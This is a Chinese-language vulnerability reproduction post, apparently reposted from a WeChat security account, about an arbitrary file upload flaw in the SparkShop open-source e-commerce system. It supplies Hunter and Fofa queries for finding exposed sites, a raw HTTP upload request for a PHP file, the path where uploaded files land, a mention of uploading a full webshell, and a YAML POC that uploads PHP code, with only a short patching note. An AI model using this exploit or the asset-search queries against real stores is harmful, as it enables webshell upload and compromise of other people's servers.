漏洞介绍
❝
SparkShop开源商城(也被称为星火商城)是一款基于ThinkPHP6和Element UI的开源免费可商用的高性能商城系统。适用于各类电商场景,包括但不限于B2C商城、新零售、分销商城等。无论是初创企业还是成熟品牌,都可以通过SparkShop快速搭建个性化独立商城,实现线上线下的融合营销。
❞
资产测绘
-
「Hunter」
❝
web.icon=="d37da6ce2bfe6e6f3a21cf95c7eecc0b"
❞
-
「Fofa」
❝
"SparkShop"
漏洞复现
「1、构造数据包」
POST /api/Common/uploadFile HTTP/2
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundaryj7OlOPiiukkdktZR
------WebKitFormBoundaryj7OlOPiiukkdktZR
Content-Disposition: form-data; name="file";filename="1.php"
------WebKitFormBoundaryj7OlOPiiukkdktZR--
「2、查看上传的文件」
/storage/api/20240827/8360c5f4e6e1a956aa8f5798f2263109.php
「3、本地搭建环境尝试上传一个大马」
POC(Yaml)
话不多说先上POC(Yam-poc由yakit或ProjectDiscovery Cloud Platform生成,Python-poc脚本由chatgpt生成,准确性请自测,如您觉得有用,请动动小手点个关注,为您每天更新最新漏洞POC)
链接:https://pan.baidu.com/s/1HNaRb4be5KE73YTBW4Pbhw?pwd=so00 提取码:so00
id: SparkShop-uploadFile info: name: SparkShop-uploadFile author: msk severity: high http: - raw: - |+ POST /api/Common/uploadFile HTTP/2 Host:{{Hostname}} User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryj7OlOPiiukkdktZR ------WebKitFormBoundaryj7OlOPiiukkdktZR Content-Disposition: form-data; name="file";filename="1.php" <?php phpinfo();unlink(__FILE__);?> ------WebKitFormBoundaryj7OlOPiiukkdktZR-- matchers: - type: dsl dsl: - status_code==200 && contains_all(body,"storage\/api\")
修复方案
❝
官方已发布安全补丁,建议联系厂商打补丁或升级版本。 引入Web应用防火墙防护,配置接口拦截策略。 ❞
原文始发于微信公众号(如棠安全):【漏洞复现】SparkShop开源商城 uploadFile 任意文件上传漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论